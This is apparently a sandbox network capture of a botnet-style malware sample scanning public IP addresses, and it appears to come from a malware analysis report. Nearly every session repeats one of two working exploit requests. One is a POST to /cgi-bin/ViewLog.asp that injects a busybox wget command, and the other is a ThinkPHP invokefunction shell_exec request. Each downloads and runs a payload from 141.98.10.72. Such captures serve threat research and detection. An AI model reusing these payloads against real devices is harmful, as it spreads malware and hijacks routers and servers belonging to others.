                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      899192.168.2.154996631.200.78.1128080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:53.521717072 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      900192.168.2.154635495.164.62.16780
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:53.678961992 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:53.881423950 CET115INHTTP/1.1 400 Bad Request
                                                      Content-Type: text/plain; charset=utf-8
                                                      Connection: close
                                                      Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                      Data Ascii: 400 Bad Request


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      901192.168.2.155649295.216.1.1468080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:53.701423883 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:53.935167074 CET490INHTTP/1.1 400 Bad Request
                                                      Content-Type: text/html; charset=us-ascii
                                                      Server: Microsoft-HTTPAPI/2.0
                                                      Date: Wed, 14 Feb 2024 08:30:53 GMT
                                                      Connection: close
                                                      Content-Length: 311
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      902192.168.2.153394095.79.31.24680
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:53.704866886 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:53.933424950 CET317INHTTP/1.1 400 Bad Request
                                                      Server: Web server
                                                      Date: Wed, 14 Feb 2024 08:30:47 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 155
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 57 65 62 20 73 65 72 76 65 72 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>Web server</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      903192.168.2.154064662.29.65.998080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:53.727003098 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      904192.168.2.154094294.120.25.2148080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:53.728823900 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      905192.168.2.155635894.120.247.218080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:53.728984118 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      906192.168.2.154485494.120.17.1728080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:53.730766058 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      907192.168.2.154243494.187.110.2468080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:53.735723019 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      908192.168.2.154948495.131.76.828080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:53.736155987 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:53.991583109 CET324INHTTP/1.1 404 Not Found
                                                      Server: nginx/1.14.0
                                                      Date: Wed, 14 Feb 2024 08:30:53 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 169
                                                      Connection: keep-alive
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      909192.168.2.154843495.209.131.4380
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:54.242217064 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:57.079658985 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:31:00.503693104 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:31:07.415395975 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:31:20.983118057 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:31:48.886240959 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      910192.168.2.1559690112.186.20.3880
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:55.205815077 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      911192.168.2.153872295.43.238.15980
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:55.714627981 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:55.944726944 CET49INHTTP/1.1 404 Site or Page Not Found
                                                      Feb 14, 2024 09:30:55.946590900 CET309INData Raw: 53 65 72 76 65 72 3a 20 48 69 6b 76 69 73 69 6f 6e 2d 57 65 62 73 0d 0a 44 61 74 65 3a 20 57 65 64 20 46 65 62 20 31 34 20 31 30 3a 31 38 3a 35 39 20 32 30 32 34 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f
                                                      Data Ascii: Server: Hikvision-WebsDate: Wed Feb 14 10:18:59 2024Pragma: no-cacheCache-Control: no-cacheContent-Type: text/html<html><head><title>Document Error: Site or Page Not Found</title></head><body><h2>Access Error: Site or Page Not


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      912192.168.2.154351431.136.22.118080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:56.235491991 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:56.855674028 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:58.103701115 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:00.759480953 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:05.879329920 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:15.863050938 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:36.598567963 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:32:17.557308912 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      913192.168.2.155233494.30.49.1258080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:56.236699104 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:56.442583084 CET659INHTTP/1.0 404 Not Found !!!
                                                      Pragma: no-cache
                                                      Content-type: text/html
                                                      <html> <head> <title>404 Not Found !!!</title> </head><body><div align="center"><center><table border="1" cellspacing="0" width="100%"> <tr> <td width="100%" bgcolor="#0000A0"> <p align="center"><font color="#FFFFFF" face="Arial"> <strong>404 Not Found !!!</strong></font></td> </tr> <tr> <td width="100%" bgcolor="#F3F3F3" bordercolor="#000080" bordercolordark="#000080"> <p align="center"><font face="Times New Romain" color="#000000"> <strong>The requested URL was not found on this server.</strong></font></td> </tr></table></body></html>
                                                      Data Raw:
                                                      Data Ascii:


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      914192.168.2.154962431.16.68.458080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:56.256284952 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:56.551572084 CET1286INHTTP/1.1 400 Bad Request
                                                      Date: Wed, 14 Feb 2024 08:30:56 GMT
                                                      Server: Apache/2.4.57 (Debian)
                                                      Referrer-Policy: no-referrer
                                                      X-Content-Type-Options: nosniff
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Permitted-Cross-Domain-Policies: none
                                                      X-Robots-Tag: noindex, nofollow
                                                      X-XSS-Protection: 1; mode=block
                                                      X-Powered-By: PHP/8.2.13
                                                      Set-Cookie: ocg4nas66t4k=031e107804889aa55840d6bdeb130047; path=/; HttpOnly; SameSite=Lax
                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                      Pragma: no-cache
